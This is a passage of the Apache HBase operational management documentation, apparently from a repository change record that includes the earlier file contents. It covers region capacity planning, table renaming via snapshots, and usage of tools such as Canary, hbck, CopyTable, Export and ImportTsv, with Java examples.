data.\nHDFS replication factor only affects your disk usage and is invisible to most HBase code.\n\n==== Viewing the Current Number of Regions\n\nYou can view the current number of regions for a given table using the HMaster UI.\nIn the [label]#Tables# section, the number of online regions for each table is listed in the [label]#Online Regions# column.\nThis total only includes the in-memory state and does not include disabled or offline regions.\nIf you do not want to use the HMaster UI, you can determine the number of regions by counting the number of subdirectories of the \/hbase\/<table>\/ subdirectories in HDFS, or by running the `bin\/hbase hbck` command.\nEach of these methods may return a slightly different number, depending on the status of each region.\n\n[[ops.capacity.regions.count]]\n==== Number of regions per RS - upper bound\n\nIn production scenarios, where you have a lot of data, you are normally concerned with the maximum number of regions you can have per server.
<<too_many_regions,too many regions>> has technical discussion on the subject.\nBasically, the maximum number of regions is mostly determined by memstore memory usage.\nEach region has its own memstores; these grow up to a configurable size, usually in the 128-256 MB range; see <<hbase.hregion.memstore.flush.size,hbase.hregion.memstore.flush.size>>.\nOne memstore exists per column family (so there's only one per region if there's one CF in the table). The RS dedicates some fraction of total memory to its memstores (see <<hbase.regionserver.global.memstore.size,hbase.regionserver.global.memstore.size>>). If this memory is exceeded (too much memstore usage), it can cause undesirable consequences such as an unresponsive server or compaction storms.\nA good starting point for the number of regions per RS (assuming one table) is:\n\n[source]\n----\n((RS memory) * (total memstore fraction)) \/ ((memstore size)*(# column families))\n----\n\nThis formula is pseudo-code.\nHere are two formulas using the actual tunable parameters, first for HBase 0.98+ and second for HBase 0.94.x.\n\nHBase 0.98.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.size) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\nHBase 0.94.x::\n----\n((RS Xmx) * hbase.regionserver.global.memstore.upperLimit) \/ (hbase.hregion.memstore.flush.size * (# column families))\n----\n\nIf a given RegionServer has 16 GB of RAM, with default settings, the formula works out to 16384*0.4\/128 ~ 51 regions per RS as a starting point.\nThe formula can be extended to multiple tables; if they all have the same configuration, just use the total number of families.
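\nAs a worked example of the formula above, the following illustrative Java snippet reproduces the 16 GB calculation. The method name and structure are assumptions for illustration, not HBase code.\n\n[source,java]\n----\npublic class RegionCountEstimate {\n\n  \/\/ Starting-point estimate: (RS heap * memstore fraction) \/ (flush size * column families).\n  static long startingRegionCount(long rsXmxMb, double memstoreFraction,\n                                  long flushSizeMb, int columnFamilies) {\n    return (long) ((rsXmxMb * memstoreFraction) \/ (flushSizeMb * columnFamilies));\n  }\n\n  public static void main(String[] args) {\n    \/\/ 16 GB heap, default hbase.regionserver.global.memstore.size = 0.4,\n    \/\/ default hbase.hregion.memstore.flush.size = 128 MB, one column family:\n    System.out.println(startingRegionCount(16384, 0.4, 128, 1)); \/\/ ~51\n  }\n}\n----\n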
This number can be adjusted; the formula above assumes all your regions are filled at approximately the same rate.\nIf only a fraction of your regions are going to be actively written to, you can divide the result by that fraction to get a larger region count.\nThen, even if all regions are written to, all region memstores are not filled evenly, and eventually jitter appears even if they are (due to the limited number of concurrent flushes).\nThus, one can have as many as 2-3 times more regions than the starting point; however, increased numbers carry increased risk.\n\nFor write-heavy workloads, the memstore fraction can be increased in configuration at the expense of the block cache; this will also allow one to have more regions.\n\n[[ops.capacity.regions.mincount]]\n==== Number of regions per RS - lower bound\n\nHBase scales by having regions across many servers.\nThus if you have 2 regions for 16 GB of data, on a 20-node cluster your data will be concentrated on just a few machines - nearly the entire cluster will be idle.\nThis really can't be stressed enough, since a common problem is loading 200 MB of data into HBase and then wondering why your awesome 10-node cluster isn't doing anything.\n\nOn the other hand, if you have a very large amount of data, you may also want to go for a larger number of regions to avoid having regions that are too large.\n\n[[ops.capacity.regions.size]]\n==== Maximum region size\n\nFor large tables in production scenarios, maximum region size is mostly limited by compactions - very large compactions, esp.\nmajor, can degrade cluster performance.\nCurrently, the recommended maximum region size is 10-20 GB, and 5-10 GB is optimal.\nFor the older 0.90.x codebase, the upper bound of region size is about 4 GB, with a default of 256 MB.\n\nThe size at which the region is split into two is generally configured via <<hbase.hregion.max.filesize,hbase.hregion.max.filesize>>; for details, see <<arch.region.splits,arch.region.splits>>.\n\nIf you cannot estimate the size of your tables well, when starting off, it's probably best to stick to the default region size, perhaps going smaller for hot tables (or manually split hot regions to spread the load over the cluster), or go with larger region sizes if your cell sizes tend to be largish (100k and up).\n\nIn HBase 0.98, an experimental stripe compactions feature was added that allows for larger regions, especially for log data.\nSee <<ops.stripe,ops.stripe>>.\n\n[[ops.capacity.regions.total]]\n==== Total data size per region server\n\nAccording to the above numbers for region size and number of regions per region server, in an optimistic estimate 10 GB x 100 regions per RS will give up to 1 TB served per region server, which is in line with some of the reported multi-PB use cases.\nHowever, it is important to think about the data vs cache size ratio at the RS level.\nWith 1 TB of data per server and 10 GB block cache, only 1% of the data will be cached, which may barely cover all block indices.\n\n[[ops.capacity.config]]\n=== Initial configuration and tuning\n\nFirst, see <<important_configurations,important configurations>>.\nNote that some configurations, more than others, depend on specific scenarios.\nPay special attention to:\n\n* <<hbase.regionserver.handler.count,hbase.regionserver.handler.count>> - request handler thread count, vital for high-throughput workloads.\n* <<config.wals,config.wals>> - the blocking number of WAL files depends on your memstore configuration and should be set accordingly to prevent potential blocking when doing a high volume of writes.\n\nThen, there are some considerations when setting up your cluster and tables.\n\n[[ops.capacity.config.compactions]]\n==== Compactions\n\nDepending on read\/write volume and latency requirements, optimal compaction settings may be different.\nSee <<compaction,compaction>> for some details.\n\nWhen provisioning for large data sizes, however, it's good to keep in mind that compactions can affect write throughput.\nThus, for
write-intensive workloads, you may opt for less frequent compactions and more store files per region.\nThe minimum number of files for compactions (`hbase.hstore.compaction.min`) can be set to a higher value; <<hbase.hstore.blockingStoreFiles,hbase.hstore.blockingStoreFiles>> should also be increased, as more files might accumulate in that case.\nYou may also consider manually managing compactions: <<managed.compactions,managed.compactions>>\n\n[[ops.capacity.config.presplit]]\n==== Pre-splitting the table\n\nBased on the target number of regions per RS (see <<ops.capacity.regions.count,ops.capacity.regions.count>>) and the number of RSes, one can pre-split the table at creation time.\nThis would both avoid some costly splitting as the table starts to fill up, and ensure that the table starts out already distributed across many servers.\n\nIf the table is expected to grow large enough to justify that, at least one region per RS should be created.\nIt is not recommended to split immediately into the full target number of regions (e.g.\n50 * number of RSes), but a low intermediate value can be chosen.\nFor multiple tables, it is recommended to be conservative with presplitting (e.g.\npre-split 1 region per RS at most), especially if you don't know how much each table will grow.\nIf you split too much, you may end up with too many regions, with some tables having too many small regions.\n\nFor a pre-splitting howto, see <<manual_region_splitting_decisions,manual region splitting decisions>> and <<precreate.regions,precreate.regions>>.
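\nAs an illustration, a table can be pre-split at creation time through the `Admin` API by supplying a key range and a region count. The table name, column family, key range, and region count below are assumptions for the example.\n\n[source,java]\n----\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.HColumnDescriptor;\nimport org.apache.hadoop.hbase.HTableDescriptor;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\nimport org.apache.hadoop.hbase.util.Bytes;\n\npublic class PresplitExample {\n  public static void main(String[] args) throws Exception {\n    try (Connection connection = ConnectionFactory.createConnection(HBaseConfiguration.create());\n         Admin admin = connection.getAdmin()) {\n      HTableDescriptor desc = new HTableDescriptor(TableName.valueOf(\"presplit_table\"));\n      desc.addFamily(new HColumnDescriptor(\"cf\"));\n      \/\/ Create the table pre-split into 10 regions, with region boundaries\n      \/\/ spaced evenly between the given first and last row keys.\n      admin.createTable(desc, Bytes.toBytes(\"0000000000\"), Bytes.toBytes(\"9999999999\"), 10);\n    }\n  }\n}\n----\n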
[[table.rename]]\n== Table Rename\n\nIn versions 0.90.x of hbase and earlier, we had a simple script that would rename the hdfs table directory and then do an edit of the hbase:meta table replacing all mentions of the old table name with the new.\nThe script was called `.\/bin\/rename_table.rb`.\nThe script was deprecated and removed mostly because it was unmaintained and the operation performed by the script was brutal.\n\nAs of hbase 0.94.x, you can use the snapshot facility to rename a table.\nHere is how you would do it using the hbase shell:\n\n----\nhbase shell> disable 'tableName'\nhbase shell> snapshot 'tableName', 'tableSnapshot'\nhbase shell> clone_snapshot 'tableSnapshot', 'newTableName'\nhbase shell> delete_snapshot 'tableSnapshot'\nhbase shell> drop 'tableName'\n----\n\nor in code it would be as follows:\n\n[source,java]\n----\nvoid rename(Admin admin, TableName oldTableName, TableName newTableName) throws IOException {\n  String snapshotName = randomName();\n  admin.disableTable(oldTableName);\n  admin.snapshot(snapshotName, oldTableName);\n  admin.cloneSnapshot(snapshotName, newTableName);\n  admin.deleteSnapshot(snapshotName);\n  admin.deleteTable(oldTableName);\n}\n----\n","old_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter will cover operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for the _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThe Canary tool can help users canary-test the HBase cluster status, at the granularity of every column family of every region, or at RegionServer granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...]
| [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool returns non-zero error codes to the user so that it can collaborate with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----
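\nFor example, a monitoring wrapper can run the canary and act on these exit codes. The following illustrative Java sketch does exactly that; the path to the `hbase` script is an assumption, so adjust it for your installation.\n\n[source,java]\n----\nimport java.io.IOException;\n\npublic class CanaryCheck {\n  public static void main(String[] args) throws IOException, InterruptedException {\n    \/\/ Run the canary with a 60-second timeout, forwarding its output to this process.\n    Process p = new ProcessBuilder(\"\/usr\/local\/hbase\/bin\/hbase\", \"canary\", \"-t\", \"60000\")\n        .inheritIO()\n        .start();\n    int code = p.waitFor();\n    switch (code) {\n      case 0:  System.out.println(\"OK\"); break;\n      case 1:  System.out.println(\"usage error\"); break;          \/\/ USAGE_EXIT_CODE\n      case 2:  System.out.println(\"initialization error\"); break; \/\/ INIT_ERROR_EXIT_CODE\n      case 3:  System.out.println(\"timeout\"); break;              \/\/ TIMEOUT_ERROR_EXIT_CODE\n      default: System.out.println(\"canary error\"); break;         \/\/ ERROR_EXIT_CODE\n    }\n    System.exit(code);\n  }\n}\n----\n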
Here are some examples based on the following case: there are two tables, test-01 and test-02, which have two column families, cf1 and cf2, respectively, and are deployed on 3 RegionServers, as shown in the following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf2 in 8ms\n----\n\nAs you can see, table test-01 has two regions and two column families, so the Canary tool picks 4 small pieces of data from 4 (2 regions * 2 stores) different stores.\nThis is the default behavior of the tool.\n\n==== Canary test for every column family (store) of every region of specific table(s)\n\nYou can also test one or more specific tables.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary test-01 test-02\n----\n\n==== Canary test with RegionServer granularity\n\nThis will pick one small piece of data from each RegionServer; you can also pass RegionServer names as input options to canary-test specific RegionServers.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -regionserver\n\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms\n13\/12\/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms\n----\n\n==== Canary test with regular expression pattern\n\nThis will test both table test-01 and test-02.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -e test-0[1-2]\n----\n\n==== Run canary test as daemon mode\n\nRun repeatedly with the interval defined in the option `-interval`, whose default value is 6 seconds.\nThis daemon will stop itself and return a non-zero error code if any error occurs, because the default value of the option `-f` is true.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon\n----\n\nRun repeatedly with a configured interval, and do not stop even if errors occur in the test.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -daemon -interval 50000 -f false\n----\n\n==== Force timeout if canary test stuck\n\nIn some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.\nBecause of this we provide a timeout option to kill the canary test and return a non-zero error code.\nThis run sets the timeout value to 60 seconds; the default value is 600 seconds.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -t 60000\n----\n\n==== Enable write sniffing in canary\n\nBy default, the canary tool only checks read operations, so it is hard to find problems in the\nwrite path. To enable write sniffing, you can run the canary with the `-writeSniffing` option.\nWhen write sniffing is enabled, the canary tool will create an hbase table and make sure the\nregions of the table are distributed across all region servers. In each sniffing period, the canary will\ntry to put data into these regions to check the write availability of each region server.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing\n----\n\nThe default write table is `hbase:canary` and can be specified by the option `-writeTable`.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -writeSniffing -writeTable ns:canary\n----\n\nThe default size of each put value is 10 bytes; you can set it via the config key\n`hbase.canary.write.value.size`.\n\n==== Treat read \/ write failure as error\n\nBy default, the canary tool only logs read failures, due to e.g. RetriesExhaustedException,\nwhile returning a normal exit code. To treat read \/ write failures as errors, you can run the canary\nwith the `-treatFailureAsError` option.
When enabled, read \/ write failures result in an error exit code.\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -treatFailureAsError\n----\n\n==== Running Canary in a Kerberos-enabled Cluster\n\nTo run the Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:\n\n* `hbase.client.keytab.file`\n* `hbase.client.kerberos.principal`\n\nKerberos credentials are refreshed every 30 seconds when the Canary runs in daemon mode.\n\nTo configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.\n\n* `hbase.client.dns.interface`\n* `hbase.client.dns.nameserver`\n\n.Canary in a Kerberos-Enabled Cluster\n====\nThis example shows each of the properties with valid values.\n\n[source,xml]\n----\n<property>\n  <name>hbase.client.kerberos.principal<\/name>\n  <value>hbase\/_HOST@YOUR-REALM.COM<\/value>\n<\/property>\n<property>\n  <name>hbase.client.keytab.file<\/name>\n  <value>\/etc\/hbase\/conf\/keytab.krb5<\/value>\n<\/property>\n<!-- optional params -->\n<property>\n  <name>hbase.client.dns.interface<\/name>\n  <value>default<\/value>\n<\/property>\n<property>\n  <name>hbase.client.dns.nameserver<\/name>\n  <value>default<\/value>\n<\/property>\n----\n====\n\n[[health.check]]\n=== Health Checker\n\nYou can configure HBase to run a script periodically and, if it fails N times (configurable), have the server exit.\nSee _HBASE-7351 Periodic health check script_ for configurations and detail.\n\n=== Driver\n\nSeveral frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin\/hbase_ command.\nThese utilities represent MapReduce jobs which run on your cluster.\nThey are run in the following way, replacing _UtilityName_ with the utility you want to run.\nThis command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.\n\n----\n\n${HBASE_HOME}\/bin\/hbase org.apache.hadoop.hbase.mapreduce.UtilityName\n----\n\nThe following utilities are available:\n\n`LoadIncrementalHFiles`::\n Complete a bulk data load.\n\n`CopyTable`::\n Export a table from the local cluster to a peer cluster.\n\n`Export`::\n Write table data to HDFS.\n\n`Import`::\n Import data written by a previous `Export` operation.\n\n`ImportTsv`::\n Import data in TSV format.\n\n`RowCounter`::\n Count rows in an HBase table.\n\n`CellCounter`::\n Count cells in an HBase table.\n\n`replication.VerifyReplication`::\n Compare the data from tables in two different clusters.\n WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.\n Note that this command is in a different package than the others.\n\nEach command except `RowCounter` and `CellCounter` accepts a single `--help` argument to print usage instructions.\n\n[[hbck]]\n=== HBase `hbck`\n\nTo run `hbck` against your HBase cluster, run `$ .\/bin\/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.\nIf your cluster reports inconsistencies, pass `-details` to see more detail emitted.\nIf it reports inconsistencies, run `hbck` a few times because the inconsistency may be transient (e.g.
cluster is starting up or a region is splitting).\nPassing `-fix` may correct the inconsistency (this is an experimental feature).\n\nFor more information, see <<hbck.in.depth>>.\n\n[[hfile_tool2]]\n=== HFile Tool\n\nSee <<hfile_tool>>.\n\n=== WAL Tools\n\n[[hlog_tool]]\n==== `FSHLog` tool\n\nThe main method on `FSHLog` offers manual split and dump facilities.\nPass it WALs or the product of a split, the content of the _recovered.edits_ directory.\n\nYou can get a textual dump of a WAL file content by doing the following:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\nThe return code will be non-zero if there are any issues with the file, so you can test the soundness of the file by redirecting `STDOUT` to `\/dev\/null` and testing the program return code.\n\nSimilarly you can force a split of a log file directory by doing:\n\n----\n $ .\/bin\/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/\n----\n\n[[hlog_tool.prettyprint]]\n===== WAL Pretty Printer\n\nThe WAL Pretty Printer is a tool with configurable options to print the contents of a WAL.\nYou can invoke it via the HBase cli with the `wal` command.\n\n----\n $ .\/bin\/hbase wal hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n\n.WAL Printing in older versions of HBase\n[NOTE]\n====\nPrior to version 2.0, the WAL Pretty Printer was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.\nIn those versions, you can print the contents of a WAL using the same configuration as above, but with the `hlog` command.\n\n----\n $ .\/bin\/hbase hlog hdfs:\/\/example.org:8020\/hbase\/.logs\/example.org,60020,1283516293161\/10.10.21.10%3A60020.1283973724012\n----\n====\n\n[[compression.tool]]\n=== Compression Tool\n\nSee <<compression.test,compression.test>>.\n\n[[copy.table]]\n=== CopyTable\n\nCopyTable is a utility that can copy part or all of a table, either to the same cluster or to another cluster.\nThe target table must first exist.\nThe usage is as follows:\n\n----\n\n$ .\/bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help\nUsage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>\n\nOptions:\n rs.class hbase.regionserver.class of the peer cluster,\n specify if different from current cluster\n rs.impl hbase.regionserver.impl of the peer cluster,\n startrow the start row\n stoprow the stop row\n starttime beginning of the time range (unixtime in millis)\n without endtime means from starttime to forever\n endtime end of the time range.
Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeper.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, the CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:http:\/\/www.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of a table to HDFS in a sequence file.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\nNOTE: To see usage instructions, run the command with no options. Available options include\nspecifying column families and applying filters during the export.\n\nBy default, the `Export` tool only exports the newest version of a given cell, regardless of the number of versions stored.
To export more than one version, replace *_<versions>_* with the desired number of versions.\n\nNote: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n\n[[import]]\n=== Import\n\nImport is a utility that will load data that has been exported back into HBase.\nInvoke via:\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\nNOTE: To see usage instructions, run the command with no options.\n\nTo import 0.94 exported files in a 0.96 cluster or onwards, you need to set system property \"hbase.import.version\" when running the import command as below:\n\n----\n$ bin\/hbase -Dhbase.import.version=0.94 org.apache.hadoop.hbase.mapreduce.Import <tablename> <inputdir>\n----\n\n[[importtsv]]\n=== ImportTsv\n\nImportTsv is a utility that will load data in TSV format into HBase.\nIt has two distinct usages: loading data from TSV format in HDFS into HBase via Puts, and preparing StoreFiles to be loaded via the `completebulkload`.\n\nTo load data via Puts (i.e., non-bulk loading):\n\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c <tablename> <hdfs-inputdir>\n----\n\nTo generate StoreFiles for bulk-loading:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.ImportTsv -Dimporttsv.columns=a,b,c -Dimporttsv.bulk.output=hdfs:\/\/storefile-outputdir <tablename> <hdfs-data-inputdir>\n----\n\nThese generated StoreFiles can be loaded into HBase via <<completebulkload,completebulkload>>.\n\n[[importtsv.options]]\n==== ImportTsv Options\n\nRunning `ImportTsv` with no arguments prints brief usage information:\n\n----\n\nUsage: importtsv -Dimporttsv.columns=a,b,c <tablename> <inputdir>\n\nImports the given input directory of TSV data into the specified table.\n\nThe column names of the TSV data must be specified using the -Dimporttsv.columns\noption. This option takes the form of comma-separated column names, where each\ncolumn name is either a simple column family, or a columnfamily:qualifier. The special\ncolumn name HBASE_ROW_KEY is used to designate that this column should be used\nas the row key for each imported record. You must specify exactly one column\nto be the row key, and you must specify a column name for every column that exists in the\ninput data.\n\nBy default importtsv will load data directly into HBase. 
To instead generate\nHFiles of data to prepare for a bulk data load, pass the option:\n -Dimporttsv.bulk.output=\/path\/for\/output\n Note: the target table will be created with default column family descriptors if it does not already exist.\n\nOther options that may be specified with -D include:\n -Dimporttsv.skip.bad.lines=false - fail if encountering an invalid line\n '-Dimporttsv.separator=|' - eg separate on pipes instead of tabs\n -Dimporttsv.timestamp=currentTimeAsLong - use the specified timestamp for the import\n -Dimporttsv.mapper.class=my.Mapper - A user-defined Mapper to use instead of org.apache.hadoop.hbase.mapreduce.TsvImporterMapper\n----\n\n[[importtsv.example]]\n==== ImportTsv Example\n\nFor example, assume that we are loading data into a table called 'datatsv' with a ColumnFamily called 'd' with two columns \"c1\" and \"c2\".\n\nAssume that an input file exists as follows:\n----\n\nrow1\tc1\tc2\nrow2\tc1\tc2\nrow3\tc1\tc2\nrow4\tc1\tc2\nrow5\tc1\tc2\nrow6\tc1\tc2\nrow7\tc1\tc2\nrow8\tc1\tc2\nrow9\tc1\tc2\nrow10\tc1\tc2\n----\n\nFor ImportTsv to use this input file, the command line needs to look like this:\n\n----\n\n HADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar importtsv -Dimporttsv.columns=HBASE_ROW_KEY,d:c1,d:c2 -Dimporttsv.bulk.output=hdfs:\/\/storefileoutput datatsv hdfs:\/\/inputfile\n----\n\n\\... and in this example the first column is the rowkey, which is why the HBASE_ROW_KEY is used.\nThe second and third columns in the file will be imported as \"d:c1\" and \"d:c2\", respectively.\n\n[[importtsv.warning]]\n==== ImportTsv Warning\n\nIf you are preparing a lot of data for bulk loading, make sure the target HBase table is pre-split appropriately.\n\n[[importtsv.also]]\n==== See Also\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>\n\n[[completebulkload]]\n=== CompleteBulkLoad\n\nThe `completebulkload` utility will move generated StoreFiles into an HBase table.\nThis utility is often used in conjunction with output from <<importtsv,importtsv>>.\n\nThere are two ways to invoke this utility, with explicit classname and via the driver:\n\n.Explicit Classname\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.LoadIncrementalHFiles <hdfs:\/\/storefileoutput> <tablename>\n----\n\n.Driver\n----\nHADOOP_CLASSPATH=`${HBASE_HOME}\/bin\/hbase classpath` ${HADOOP_HOME}\/bin\/hadoop jar ${HBASE_HOME}\/hbase-server-VERSION.jar completebulkload <hdfs:\/\/storefileoutput> <tablename>\n----\n\n[[completebulkload.warning]]\n==== CompleteBulkLoad Warning\n\nData generated via MapReduce is often created with file permissions that are not compatible with the running HBase process.\nAssuming you're running HDFS with permissions enabled, those permissions will need to be updated before you run CompleteBulkLoad.\n\nFor more information about bulk-loading HFiles into HBase, see <<arch.bulk.load,arch.bulk.load>>.
